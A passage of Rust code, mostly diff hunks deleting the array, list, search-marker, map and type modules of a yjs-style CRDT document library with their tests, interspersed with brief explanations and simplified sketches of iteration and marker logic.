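        // Take the baseline before spawning so that no later write is missed.
        let mut last = source.load(Ordering::Acquire);
        let handle = spawn(move || loop {
            sleep(interval);
            // The flag is checked once per tick, so stopping takes at most one interval.
            if !flag.load(Ordering::Acquire) {
                break;
            }
            let current = source.load(Ordering::Acquire);
            if current != last {
                seen.lock().unwrap().push(current);
                last = current;
            }
        });
        Self {
            observing,
            handle: Mutex::new(Some(handle)),
        }
    }

    /// Idempotent: the handle is taken out of the `Option`, so a second call is a no-op.
    fn stop(&self) {
        if let Some(handle) = self.handle.lock().unwrap().take() {
            self.observing.store(false, Ordering::Release);
            handle.join().unwrap();
        }
    }
}
```

Because changes are only compared once per tick, several writes inside one interval are reported as a single change, which matches the batching visible in the test above.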
File diff suppressed because it is too large
@@ -1,247 +0,0 @@
use super::*;
impl_type!(Array);
impl ListType for Array {}
pub struct ArrayIter<'a> {
iter: ListIterator<'a>,
pending: Option<PendingArrayValues>,
}
enum PendingArrayValues {
Any { values: Vec<Any>, index: usize },
}
impl Iterator for ArrayIter<'_> {
type Item = Value;
fn next(&mut self) -> Option<Self::Item> {
loop {
if let Some(PendingArrayValues::Any { values, index }) = &mut self.pending {
if *index < values.len() {
let value = values[*index].clone();
*index += 1;
return Some(Value::Any(value));
}
self.pending = None;
}
let item = self.iter.next()?;
if let Some(item) = item.get() {
if !item.countable() {
continue;
}
match &item.content {
Content::Any(values) if !values.is_empty() => {
if values.len() > 1 {
self.pending = Some(PendingArrayValues::Any {
values: values.clone(),
index: 1,
});
}
return Some(Value::Any(values[0].clone()));
}
_ => return Some(Value::from(&item.content)),
}
}
}
}
}
impl Array {
#[inline(always)]
pub fn id(&self) -> Option<Id> {
self._id()
}
#[inline]
pub fn len(&self) -> u64 {
self.content_len()
}
#[inline]
pub fn is_empty(&self) -> bool {
self.len() == 0
}
pub fn get(&self, index: u64) -> Option<Value> {
let (item, offset) = self.get_item_at(index)?;
item.get().and_then(|item| {
// TODO: rewrite to content.read(&mut [Any])
match &item.content {
Content::Any(any) => any.get(offset as usize).map(|any| Value::Any(any.clone())),
_ => Some(Value::from(&item.content)),
}
})
}
pub fn iter(&self) -> ArrayIter<'_> {
ArrayIter {
iter: self.iter_item(),
pending: None,
}
}
pub fn push<V: Into<Value>>(&mut self, val: V) -> JwstCodecResult {
self.insert(self.len(), val)
}
pub fn insert<V: Into<Value>>(&mut self, idx: u64, val: V) -> JwstCodecResult {
self.insert_at(idx, val.into().into())
}
pub fn remove(&mut self, idx: u64, len: u64) -> JwstCodecResult {
self.remove_at(idx, len)
}
}
impl serde::Serialize for Array {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
use serde::ser::SerializeSeq;
let mut seq = serializer.serialize_seq(Some(self.len() as usize))?;
for item in self.iter() {
seq.serialize_element(&item)?;
}
seq.end()
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_yarray_insert() {
let options = DocOptions::default();
loom_model!({
let doc = Doc::with_options(options.clone());
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, " ").unwrap();
array.insert(0, "Hello").unwrap();
array.insert(2, "World").unwrap();
assert_eq!(array.get(0).unwrap(), Value::Any(Any::String("Hello".into())));
assert_eq!(array.get(1).unwrap(), Value::Any(Any::String(" ".into())));
assert_eq!(array.get(2).unwrap(), Value::Any(Any::String("World".into())));
});
}
#[test]
fn test_yarray_delete() {
let options = DocOptions::default();
loom_model!({
let doc = Doc::with_options(options.clone());
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, " ").unwrap();
array.insert(0, "Hello").unwrap();
array.insert(2, "World").unwrap();
array.remove(0, 2).unwrap();
assert_eq!(array.get(0).unwrap(), Value::Any(Any::String("World".into())));
});
}
#[test]
#[cfg_attr(miri, ignore)]
fn test_ytext_equal() {
use yrs::{Options, Text, Transact};
let options = DocOptions::default();
let yrs_options = Options::default();
loom_model!({
let doc = yrs::Doc::with_options(yrs_options.clone());
let array = doc.get_or_insert_text("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, " ");
array.insert(&mut trx, 0, "Hello");
array.insert(&mut trx, 6, "World");
array.insert(&mut trx, 11, "!");
let buffer = trx.encode_update_v1();
let mut decoder = RawDecoder::new(&buffer);
let update = Update::read(&mut decoder).unwrap();
let mut doc = Doc::with_options(options.clone());
doc.apply_update(update).unwrap();
let array = doc.get_or_create_array("abc").unwrap();
assert_eq!(array.get(0).unwrap(), Value::Any(Any::String("Hello".into())));
assert_eq!(array.get(5).unwrap(), Value::Any(Any::String(" ".into())));
assert_eq!(array.get(6).unwrap(), Value::Any(Any::String("World".into())));
assert_eq!(array.get(11).unwrap(), Value::Any(Any::String("!".into())));
});
let options = DocOptions::default();
let yrs_options = Options::default();
loom_model!({
let doc = yrs::Doc::with_options(yrs_options.clone());
let array = doc.get_or_insert_text("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, "Hello");
array.insert(&mut trx, 5, " ");
array.insert(&mut trx, 6, "World");
array.insert(&mut trx, 11, "!");
let buffer = trx.encode_update_v1();
let mut decoder = RawDecoder::new(&buffer);
let update = Update::read(&mut decoder).unwrap();
let mut doc = Doc::with_options(options.clone());
doc.apply_update(update).unwrap();
let array = doc.get_or_create_array("abc").unwrap();
assert_eq!(array.get(0).unwrap(), Value::Any(Any::String("Hello".into())));
assert_eq!(array.get(5).unwrap(), Value::Any(Any::String(" ".into())));
assert_eq!(array.get(6).unwrap(), Value::Any(Any::String("World".into())));
assert_eq!(array.get(11).unwrap(), Value::Any(Any::String("!".into())));
});
}
#[test]
#[cfg_attr(miri, ignore)]
fn test_yrs_array_decode() {
use yrs::{Array, Transact};
loom_model!({
let update = {
let doc = yrs::Doc::new();
let array = doc.get_or_insert_array("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, "hello");
array.insert(&mut trx, 1, "world");
array.insert(&mut trx, 1, " ");
trx.encode_update_v1()
};
let doc = Doc::try_from_binary_v1_with_options(
update.clone(),
DocOptions {
guid: String::from("1"),
client_id: 1,
gc: true,
},
)
.unwrap();
let arr = doc.get_or_create_array("abc").unwrap();
assert_eq!(arr.get(2).unwrap(), Value::Any(Any::String("world".to_string())))
});
}
}
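`ArrayIter` above yields one value at a time even though a single item may carry several values, and it skips items that are not countable. A simplified sketch of that flattening, assuming a hypothetical `Batch` type with an explicit `deleted` flag in place of the crate's `Item` and `Content`:

```rust
/// Hypothetical stand-in for an item: either deleted or carrying a batch of values.
struct Batch {
    deleted: bool,
    values: Vec<i32>,
}

/// Yields every value of every live batch, one at a time.
struct FlatIter<'a> {
    batches: std::slice::Iter<'a, Batch>,
    pending: Option<std::slice::Iter<'a, i32>>,
}

fn flat_iter(batches: &[Batch]) -> FlatIter<'_> {
    FlatIter {
        batches: batches.iter(),
        pending: None,
    }
}

impl<'a> Iterator for FlatIter<'a> {
    type Item = i32;

    fn next(&mut self) -> Option<i32> {
        loop {
            // Drain the batch that is currently in progress first.
            if let Some(pending) = &mut self.pending {
                if let Some(value) = pending.next() {
                    return Some(*value);
                }
                self.pending = None;
            }
            // Then move on to the next batch, skipping deleted ones.
            let batch = self.batches.next()?;
            if batch.deleted {
                continue;
            }
            self.pending = Some(batch.values.iter());
        }
    }
}
```

Unlike the original, this sketch borrows the values instead of cloning them, which is possible here only because the hypothetical `Batch` slice outlives the iterator.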
@@ -1,23 +0,0 @@
use super::*;
pub(crate) struct ListIterator<'a> {
pub(super) _lock: RwLockReadGuard<'a, YType>,
pub(super) cur: Somr<Item>,
}
impl Iterator for ListIterator<'_> {
type Item = Somr<Item>;
fn next(&mut self) -> Option<Self::Item> {
while let Some(item) = self.cur.clone().get() {
let cur = std::mem::replace(&mut self.cur, item.right.clone());
if item.deleted() {
continue;
}
return Some(cur);
}
None
}
}
@@ -1,253 +0,0 @@
mod iterator;
mod search_marker;
pub(crate) use iterator::ListIterator;
pub(crate) use search_marker::MarkerList;
use super::*;
#[derive(Debug)]
pub(crate) struct ItemPosition {
pub parent: YTypeRef,
pub left: ItemRef,
pub right: ItemRef,
pub index: u64,
pub offset: u64,
}
impl ItemPosition {
pub fn forward(&mut self) {
if let Some(right) = self.right.get() {
if right.indexable() {
self.index += right.len();
}
self.left = self.right.clone();
self.right = right.right.clone();
} else {
// FAIL: there is no item to the right, so the position cannot advance
}
}
/// The cursor points into the middle of a splittable item,
/// so the item must be split at the offset.
///
/// before:
/// ---------------------------------
/// ^left ^right
/// ^offset
/// after:
/// ---------------------------------
/// ^left ^right
pub fn normalize(&mut self, store: &mut DocStore) -> JwstCodecResult {
if self.offset > 0 {
debug_assert!(self.left.is_some());
if let Some(left) = self.left.get() {
let (left, right) = store.split_node(left.id, self.offset)?;
self.left = left.as_item();
self.right = right.as_item();
self.index += self.offset;
self.offset = 0;
}
}
Ok(())
}
}
pub(crate) trait ListType: AsInner<Inner = YTypeRef> {
#[inline(always)]
fn _id(&self) -> Option<Id> {
self.as_inner().ty().and_then(|ty| ty.item.get().map(|item| item.id))
}
#[inline(always)]
fn content_len(&self) -> u64 {
self.as_inner().ty().unwrap().len
}
fn iter_item(&self) -> ListIterator<'_> {
let inner = self.as_inner().ty().unwrap();
ListIterator {
cur: inner.start.clone(),
_lock: inner,
}
}
fn find_pos(&self, inner: &YType, index: u64) -> Option<ItemPosition> {
let mut remaining = index;
let start = inner.start.clone();
let mut pos = ItemPosition {
parent: self.as_inner().clone(),
left: Somr::none(),
right: start,
index: 0,
offset: 0,
};
if pos.right.is_none() {
return Some(pos);
}
if let Some(markers) = &inner.markers
&& let Some(marker) = markers.find_marker(inner, index)
{
if marker.index > remaining {
remaining = 0
} else {
remaining -= marker.index;
}
pos.index = marker.index;
pos.left = marker.ptr.get().map(|ptr| ptr.left.clone()).unwrap_or_default();
pos.right = marker.ptr;
};
// skip deleted items so that the position does not start on a deleted item
while let Some(item) = pos.right.get() {
if item.deleted() {
pos.right = item.right.clone();
continue;
} else {
break;
}
}
while remaining > 0 {
if let Some(item) = pos.right.get() {
if item.indexable() {
let content_len = item.len();
if remaining < content_len {
pos.offset = remaining;
remaining = 0;
} else {
pos.index += content_len;
remaining -= content_len;
}
}
pos.left = pos.right.clone();
pos.right = item.right.clone();
} else {
return None;
}
}
Some(pos)
}
fn insert_at(&mut self, index: u64, content: Content) -> JwstCodecResult {
if index > self.content_len() {
return Err(JwstCodecError::IndexOutOfBound(index));
}
if let Some((mut store, mut ty)) = self.as_inner().write() {
if let Some(mut pos) = self.find_pos(&ty, index) {
pos.normalize(&mut store)?;
Self::insert_after(&mut ty, &mut store, pos, content)?;
}
} else {
return Err(JwstCodecError::DocReleased);
}
Ok(())
}
fn insert_after(ty: &mut YType, store: &mut DocStore, pos: ItemPosition, content: Content) -> JwstCodecResult {
if let Some(markers) = &ty.markers
&& content.countable()
{
markers.update_marker_changes(pos.index, content.clock_len() as i64);
}
let item = store.create_item(
content,
pos.left.clone(),
pos.right.clone(),
Some(Parent::Type(pos.parent)),
None,
);
store.integrate(Node::Item(item), 0, Some(ty))?;
Ok(())
}
fn get_item_at(&self, index: u64) -> Option<(Somr<Item>, u64)> {
if index >= self.content_len() {
return None;
}
let ty = self.as_inner().ty().unwrap();
if let Some(pos) = self.find_pos(&ty, index) {
if pos.offset == 0 {
return Some((pos.right, 0));
} else {
return Some((pos.left, pos.offset));
}
}
None
}
fn remove_at(&mut self, idx: u64, len: u64) -> JwstCodecResult {
if len == 0 {
return Ok(());
}
let content_len = self.content_len();
if content_len == 0 {
return Ok(());
}
if idx >= content_len {
return Err(JwstCodecError::IndexOutOfBound(idx));
}
if let Some((mut store, mut ty)) = self.as_inner().write() {
if let Some(pos) = self.find_pos(&ty, idx) {
Self::remove_after(&mut ty, &mut store, pos, len)?;
}
} else {
return Err(JwstCodecError::DocReleased);
}
Ok(())
}
fn remove_after(ty: &mut YType, store: &mut DocStore, mut pos: ItemPosition, len: u64) -> JwstCodecResult {
pos.normalize(store)?;
let mut remaining = len;
while remaining > 0 {
let item_ref = pos.right.clone();
let Some((indexable, content_len, item_id)) = item_ref.get().map(|item| (item.indexable(), item.len(), item.id))
else {
break;
};
if indexable {
if remaining < content_len {
store.split_node(item_id, remaining)?;
remaining = 0;
} else {
remaining -= content_len;
}
if let Some(item) = item_ref.get() {
store.delete_item(item, Some(ty));
}
}
pos.forward();
}
if let Some(markers) = &ty.markers {
markers.update_marker_changes(pos.index, -((len - remaining) as i64));
}
Ok(())
}
}
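The lookup in `get_item_at` above walks the list, subtracts each indexable item's length from the remaining index, and reports the item together with an offset into it. A reduced sketch of that walk over a slice, assuming a hypothetical `Run` type and `locate` function (no markers, no splitting):

```rust
/// Hypothetical, simplified stand-in for an `Item`: a run of `len` elements
/// that may be deleted and then no longer counts toward indices.
struct Run {
    len: u64,
    deleted: bool,
}

/// Returns `(run_index, offset)` for the element at `index`, or `None` if
/// `index` is past the end. Deleted runs are skipped.
fn locate(runs: &[Run], index: u64) -> Option<(usize, u64)> {
    let mut remaining = index;
    for (i, run) in runs.iter().enumerate() {
        if run.deleted {
            continue;
        }
        if remaining < run.len {
            // The target lies inside this run, `remaining` elements from its start.
            return Some((i, remaining));
        }
        remaining -= run.len;
    }
    None
}
```

This walk is linear in the number of runs; the search markers in the next file exist to start the walk closer to the target instead of at the head of the list.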
@@ -1,333 +0,0 @@
use std::{
cell::RefCell,
cmp::max,
collections::VecDeque,
ops::{Deref, DerefMut},
};
use super::*;
const MAX_SEARCH_MARKER: usize = 80;
#[derive(Clone, Debug)]
pub(crate) struct SearchMarker {
pub ptr: Somr<Item>,
pub index: u64,
}
impl SearchMarker {
fn new(ptr: Somr<Item>, index: u64) -> Self {
SearchMarker { ptr, index }
}
fn overwrite_marker(&mut self, ptr: Somr<Item>, index: u64) {
self.ptr = ptr;
self.index = index;
}
}
unsafe impl Sync for MarkerList {}
/// In yjs, a timestamp field is used to sort markers, and the oldest marker is
/// deleted once the limit is reached. This was designed as an optimization
/// for V8. In Rust, we can simply use a [VecDeque] and trust the
/// compiler to optimize. The [VecDeque] naturally maintains insertion
/// order, so we know which marker is the oldest without an extra
/// timestamp field.
///
/// NOTE:
/// A [MarkerList] always belongs to a [YType],
/// which means that whenever a [MarkerList] is used, we already hold the [YType]
/// instance behind its [RwLock] guard, so it's safe to make the list
/// internally mutable.
#[derive(Debug)]
pub(crate) struct MarkerList(RefCell<VecDeque<SearchMarker>>);
impl Deref for MarkerList {
type Target = RefCell<VecDeque<SearchMarker>>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for MarkerList {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl Default for MarkerList {
fn default() -> Self {
Self::new()
}
}
impl MarkerList {
pub fn new() -> Self {
MarkerList(RefCell::new(VecDeque::new()))
}
// record a marker at the back of the deque, recycling the oldest marker once the limit is reached
fn mark_position(list: &mut VecDeque<SearchMarker>, ptr: Somr<Item>, index: u64) -> Option<SearchMarker> {
if list.len() >= MAX_SEARCH_MARKER {
let mut oldest_marker = list.pop_front().unwrap();
oldest_marker.overwrite_marker(ptr, index);
list.push_back(oldest_marker);
} else {
let marker = SearchMarker::new(ptr, index);
list.push_back(marker);
}
list.back().cloned()
}
// update mark position if the index is within the range of the marker
pub fn update_marker_changes(&self, index: u64, len: i64) {
let mut list = self.borrow_mut();
for marker in list.iter_mut() {
if len > 0 {
while let Some(ptr) = marker.ptr.get() {
if !ptr.indexable() {
let left_ref = ptr.left.clone();
if let Some(left) = left_ref.get() {
if left.indexable() {
marker.index -= left.len();
}
marker.ptr = left_ref;
} else {
// remove marker
marker.index = 0;
break;
}
} else {
break;
}
}
}
if marker.ptr.is_some() && (index < marker.index || (len > 0 && index == marker.index)) {
marker.index = max(index as i64, marker.index as i64 + len) as u64;
}
}
list.retain(|marker| marker.index > 0);
}
// find and return the marker that is closest to the index
pub fn find_marker(&self, parent: &YType, index: u64) -> Option<SearchMarker> {
if parent.start.is_none() || index == 0 {
return None;
}
let mut list = self.borrow_mut();
let marker = list.iter_mut().min_by_key(|m| (index as i64 - m.index as i64).abs());
let mut marker_index = marker.as_ref().map(|m| m.index).unwrap_or(0);
let mut item_ptr = marker
.as_ref()
.map(|m| m.ptr.clone())
.unwrap_or_else(|| parent.start.clone());
// TODO: this logic here is a bit messy
// i think it can be implemented with more streamlined code, and then optimized
{
// iterate to the right if possible
while let Some(item) = item_ptr.clone().get() {
if marker_index >= index {
break;
}
let right_ref: ItemRef = item.right.clone();
if right_ref.is_some() {
if item.indexable() {
if index < marker_index + item.len() {
break;
}
marker_index += item.len();
}
item_ptr = right_ref;
} else {
break;
}
}
// iterate to the left if necessary (might be that marker_index > index)
while let Some(item) = item_ptr.clone().get() {
if marker_index <= index {
break;
}
let left_ref: ItemRef = item.left.clone();
if let Some(left) = left_ref.get() {
if left.indexable() {
marker_index -= left.len();
}
item_ptr = left_ref;
} else {
break;
}
}
// we want to make sure that item_ptr can't be merged with left, because that
// would screw up everything. in that case just return what we have
// (it is most likely the best marker anyway).
// iterate to the left until item_ptr can't be merged with left
while let Some(item) = item_ptr.clone().get() {
let left_ref: ItemRef = item.left.clone();
if let Some(left) = left_ref.get() {
if left.id.client == item.id.client && left.id.clock + left.len() == item.id.clock {
if left.indexable() {
marker_index -= left.len();
}
item_ptr = left_ref;
continue;
}
break;
} else {
break;
}
}
}
match marker {
Some(marker)
if (marker.index as f64 - marker_index as f64).abs() < parent.len as f64 / MAX_SEARCH_MARKER as f64 =>
{
// adjust existing marker
marker.overwrite_marker(item_ptr, marker_index);
Some(marker.clone())
}
_ => {
// create new marker
Self::mark_position(&mut list, item_ptr, marker_index)
}
}
}
#[allow(dead_code)]
pub fn get_last_marker(&self) -> Option<SearchMarker> {
self.borrow().back().cloned()
}
pub fn replace_marker(&self, raw: Somr<Item>, new: Somr<Item>, len_shift: i64) {
let mut list = self.borrow_mut();
for marker in list.iter_mut() {
if marker.ptr == raw {
marker.ptr = new.clone();
marker.index = ((marker.index as i64) + len_shift) as u64;
}
}
}
}
#[cfg(test)]
mod tests {
#[cfg(not(loom))]
use rand::{Rng, SeedableRng};
#[cfg(not(loom))]
use rand_chacha::ChaCha20Rng;
use yrs::{Array, Options, Transact};
use super::*;
#[test]
fn test_marker_list() {
let options = DocOptions::default();
let yrs_options = Options::default();
loom_model!({
let (client_id, buffer) = if cfg!(miri) {
let doc = Doc::with_options(options.clone());
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, " ").unwrap();
array.insert(0, "Hello").unwrap();
array.insert(2, "World").unwrap();
(doc.client(), doc.encode_update_v1().unwrap())
} else {
let doc = yrs::Doc::with_options(yrs_options.clone());
let array = doc.get_or_insert_array("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, " ");
array.insert(&mut trx, 0, "Hello");
array.insert(&mut trx, 2, "World");
(doc.client_id(), trx.encode_update_v1())
};
let mut decoder = RawDecoder::new(&buffer);
let update = Update::read(&mut decoder).unwrap();
let mut doc = Doc::with_options(options.clone());
doc.apply_update(update).unwrap();
let array = doc.get_or_create_array("abc").unwrap();
let marker_list = MarkerList::new();
let marker = marker_list.find_marker(&array.0.ty().unwrap(), 8).unwrap();
assert_eq!(marker.index, 2);
assert_eq!(
marker.ptr,
doc
.store
.read()
.unwrap()
.get_node(Id::new(client_id, 2))
.unwrap()
.as_item()
);
});
}
#[test]
fn test_search_marker_flaky() {
let options = DocOptions::default();
loom_model!({
let doc = Doc::with_options(options.clone());
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "0").unwrap();
text.insert(1, "1").unwrap();
text.insert(0, "0").unwrap();
});
}
#[cfg(not(loom))]
fn search_with_seed(seed: u64) {
let rand = ChaCha20Rng::seed_from_u64(seed);
let iteration = 20;
let doc = Doc::with_client(1);
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "This is a string with length 32.").unwrap();
let mut len = text.len();
for i in 0..iteration {
let mut rand: ChaCha20Rng = rand.clone();
let pos = rand.random_range(0..text.len());
let str = format!("hello {i}");
len += str.len() as u64;
text.insert(pos, str).unwrap();
}
assert_eq!(text.len(), len);
assert_eq!(text.to_string().len() as u64, len);
}
#[test]
#[cfg(not(loom))]
fn test_marker_list_with_seed() {
search_with_seed(785590655803394607);
search_with_seed(12958877733367615);
search_with_seed(71776330571528794);
search_with_seed(2207805473582911);
}
}
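`mark_position` above relies on the deque's insertion order to find the oldest marker without a timestamp. A minimal sketch of that recycling step, assuming a hypothetical `Marker` type and a free function `mark` with the cap passed as a parameter:

```rust
use std::collections::VecDeque;

/// Hypothetical marker: a cached position plus a label standing in for the item pointer.
#[derive(Clone, Debug, PartialEq)]
struct Marker {
    index: u64,
    tag: &'static str,
}

/// Push a marker, recycling the oldest one once `cap` entries exist.
fn mark(list: &mut VecDeque<Marker>, cap: usize, index: u64, tag: &'static str) {
    if list.len() >= cap {
        // The front is the oldest entry because markers are only pushed at the back.
        if let Some(mut oldest) = list.pop_front() {
            oldest.index = index;
            oldest.tag = tag;
            list.push_back(oldest);
            return;
        }
    }
    list.push_back(Marker { index, tag });
}
```

Both the eviction and the insertion are O(1), and the deque never holds more than `cap` markers as long as `cap` is at least 1.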
@@ -1,320 +0,0 @@
use std::{collections::hash_map::Iter, rc::Rc};
use super::*;
use crate::{
JwstCodecResult,
doc::{AsInner, Node, Parent, YTypeRef},
impl_type,
};
impl_type!(Map);
pub(crate) trait MapType: AsInner<Inner = YTypeRef> {
fn _id(&self) -> Option<Id> {
self.as_inner().ty().and_then(|ty| ty.item.get().map(|item| item.id))
}
fn _insert<V: Into<Value>>(&mut self, key: String, value: V) -> JwstCodecResult {
if let Some((mut store, mut ty)) = self.as_inner().write() {
let left = ty.map.get(&SmolStr::new(&key)).cloned();
let item = store.create_item(
value.into().into(),
left.unwrap_or(Somr::none()),
Somr::none(),
Some(Parent::Type(self.as_inner().clone())),
Some(SmolStr::new(key)),
);
store.integrate(Node::Item(item), 0, Some(&mut ty))?;
}
Ok(())
}
fn _get(&self, key: &str) -> Option<Value> {
self.as_inner().ty().and_then(|ty| {
ty.map.get(key).and_then(|item| {
if let Some(item) = item.get() {
if item.deleted() {
return None;
}
Some(Value::from(&item.content))
} else {
None
}
})
})
}
fn _contains_key(&self, key: &str) -> bool {
if let Some(ty) = self.as_inner().ty() {
ty.map
.get(key)
.and_then(|item| item.get())
.is_some_and(|item| !item.deleted())
} else {
false
}
}
fn _remove(&mut self, key: &str) {
if let Some((mut store, mut ty)) = self.as_inner().write()
&& let Some(item) = ty.map.get(key).cloned()
&& let Some(item) = item.get()
{
store.delete_item(item, Some(&mut ty));
}
}
fn _len(&self) -> u64 {
self._keys().count() as u64
}
fn _iter(&self) -> EntriesInnerIterator<'_> {
let ty = self.as_inner().ty();
if let Some(ty) = ty {
let ty = Rc::new(ty);
EntriesInnerIterator {
iter: Some(unsafe { &*Rc::as_ptr(&ty) }.map.iter()),
_lock: Some(ty),
}
} else {
EntriesInnerIterator {
_lock: None,
iter: None,
}
}
}
fn _keys(&self) -> KeysIterator<'_> {
KeysIterator(self._iter())
}
fn _values(&self) -> ValuesIterator<'_> {
ValuesIterator(self._iter())
}
fn _entries(&self) -> EntriesIterator<'_> {
EntriesIterator(self._iter())
}
}
pub(crate) struct EntriesInnerIterator<'a> {
_lock: Option<Rc<RwLockReadGuard<'a, YType>>>,
iter: Option<Iter<'a, SmolStr, ItemRef>>,
}
pub struct KeysIterator<'a>(EntriesInnerIterator<'a>);
pub struct ValuesIterator<'a>(EntriesInnerIterator<'a>);
pub struct EntriesIterator<'a>(EntriesInnerIterator<'a>);
impl<'a> Iterator for EntriesInnerIterator<'a> {
type Item = (&'a str, &'a Item);
fn next(&mut self) -> Option<Self::Item> {
if let Some(iter) = &mut self.iter {
for (k, v) in iter {
if let Some(item) = v.get()
&& !item.deleted()
{
return Some((k.as_str(), item));
}
}
None
} else {
None
}
}
}
impl<'a> Iterator for KeysIterator<'a> {
type Item = &'a str;
fn next(&mut self) -> Option<Self::Item> {
self.0.next().map(|(k, _)| k)
}
}
impl Iterator for ValuesIterator<'_> {
type Item = Value;
fn next(&mut self) -> Option<Self::Item> {
self.0.next().map(|(_, v)| Value::from(&v.content))
}
}
impl<'a> Iterator for EntriesIterator<'a> {
type Item = (&'a str, Value);
fn next(&mut self) -> Option<Self::Item> {
self.0.next().map(|(k, v)| (k, Value::from(&v.content)))
}
}
impl MapType for Map {}
impl Map {
#[inline(always)]
pub fn id(&self) -> Option<Id> {
self._id()
}
#[inline(always)]
pub fn insert<V: Into<Value>>(&mut self, key: String, value: V) -> JwstCodecResult {
self._insert(key, value)
}
#[inline(always)]
pub fn get(&self, key: &str) -> Option<Value> {
self._get(key)
}
#[inline(always)]
pub fn contains_key(&self, key: &str) -> bool {
self._contains_key(key)
}
#[inline(always)]
pub fn remove(&mut self, key: &str) {
self._remove(key)
}
#[inline(always)]
pub fn len(&self) -> u64 {
self._len()
}
#[inline(always)]
pub fn is_empty(&self) -> bool {
self.len() == 0
}
#[inline(always)]
pub fn iter(&self) -> EntriesIterator<'_> {
self._entries()
}
#[inline(always)]
pub fn entries(&self) -> EntriesIterator<'_> {
self._entries()
}
#[inline(always)]
pub fn keys(&self) -> KeysIterator<'_> {
self._keys()
}
#[inline(always)]
pub fn values(&self) -> ValuesIterator<'_> {
self._values()
}
}
impl serde::Serialize for Map {
fn serialize<S: serde::Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> {
use serde::ser::SerializeMap;
let mut map = serializer.serialize_map(Some(self.len() as usize))?;
for (key, value) in self.iter() {
map.serialize_entry(&key, &value)?;
}
map.end()
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::{Any, Doc, loom_model};
#[test]
fn test_map_basic() {
loom_model!({
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value").unwrap();
assert_eq!(map.get("1").unwrap(), Value::Any(Any::String("value".to_string())));
assert!(!map.contains_key("nonexistent_key"));
assert_eq!(map.len(), 1);
assert!(map.contains_key("1"));
map.remove("1");
assert!(!map.contains_key("1"));
assert_eq!(map.len(), 0);
});
}
#[test]
fn test_map_equal() {
loom_model!({
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value").unwrap();
map.insert("2".to_string(), false).unwrap();
let binary = doc.encode_update_v1().unwrap();
let new_doc = Doc::try_from_binary_v1(binary).unwrap();
let map = new_doc.get_or_create_map("map").unwrap();
assert_eq!(map.get("1").unwrap(), Value::Any(Any::String("value".to_string())));
assert_eq!(map.get("2").unwrap(), Value::Any(Any::False));
assert_eq!(map.len(), 2);
});
}
#[test]
fn test_map_renew_value() {
loom_model!({
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value").unwrap();
map.insert("1".to_string(), "value2").unwrap();
assert_eq!(map.get("1").unwrap(), Value::Any(Any::String("value2".to_string())));
assert_eq!(map.len(), 1);
});
}
#[test]
fn test_map_re_encode() {
loom_model!({
let binary = {
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value1").unwrap();
map.insert("2".to_string(), "value2").unwrap();
doc.encode_update_v1().unwrap()
};
{
let doc = Doc::try_from_binary_v1(binary).unwrap();
let map = doc.get_or_create_map("map").unwrap();
assert_eq!(map.get("1").unwrap(), Value::Any(Any::String("value1".to_string())));
assert_eq!(map.get("2").unwrap(), Value::Any(Any::String("value2".to_string())));
}
});
}
#[test]
fn test_map_iter() {
loom_model!({
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value1").unwrap();
map.insert("2".to_string(), "value2").unwrap();
let mut vec = map.entries().collect::<Vec<_>>();
// hashmap iteration is in random order instead of insert order
vec.sort_by(|a, b| a.0.cmp(b.0));
assert_eq!(
vec,
vec![
("1", Value::Any(Any::String("value1".to_string()))),
("2", Value::Any(Any::String("value2".to_string())))
]
)
});
}
}
@@ -1,373 +0,0 @@
mod array;
mod list;
mod map;
mod text;
mod value;
mod xml;
use std::{
collections::hash_map::Entry,
hash::{Hash, Hasher},
sync::Weak,
};
pub use array::*;
use list::*;
pub use map::*;
pub use text::*;
pub use value::*;
pub use xml::*;
use super::{
store::{StoreRef, WeakStoreRef},
*,
};
use crate::{
Item, JwstCodecError, JwstCodecResult,
sync::{Arc, RwLock, RwLockReadGuard, RwLockWriteGuard},
};
#[derive(Debug, Default)]
pub(crate) struct YType {
pub start: Somr<Item>,
pub item: Somr<Item>,
pub map: HashMap<SmolStr, Somr<Item>>,
pub len: u64,
/// The tag name of XMLElement and XMLHook type
pub name: Option<String>,
/// The name of the type that directly belongs to the store.
pub root_name: Option<String>,
kind: YTypeKind,
pub markers: Option<MarkerList>,
}
#[derive(Debug, Default, Clone)]
pub(crate) struct YTypeRef {
pub store: WeakStoreRef,
pub inner: Somr<RwLock<YType>>,
}
impl PartialEq for YType {
fn eq(&self, other: &Self) -> bool {
self.root_name == other.root_name || (self.start.is_some() && self.start == other.start) || self.map == other.map
}
}
impl PartialEq for YTypeRef {
fn eq(&self, other: &Self) -> bool {
// only check pointer equality
// currently no scenarios that involve cross document ytype comparisons
self.inner.ptr_eq(&other.inner)
}
}
impl Eq for YTypeRef {}
impl Hash for YTypeRef {
fn hash<H: Hasher>(&self, state: &mut H) {
self.inner.ptr().hash(state);
}
}
impl YType {
pub fn new(kind: YTypeKind, tag_name: Option<String>) -> Self {
YType {
kind,
name: tag_name,
..YType::default()
}
}
pub fn kind(&self) -> YTypeKind {
self.kind
}
pub fn set_kind(&mut self, kind: YTypeKind) -> JwstCodecResult {
std::debug_assert!(kind != YTypeKind::Unknown);
if self.kind() != kind {
if self.kind == YTypeKind::Unknown {
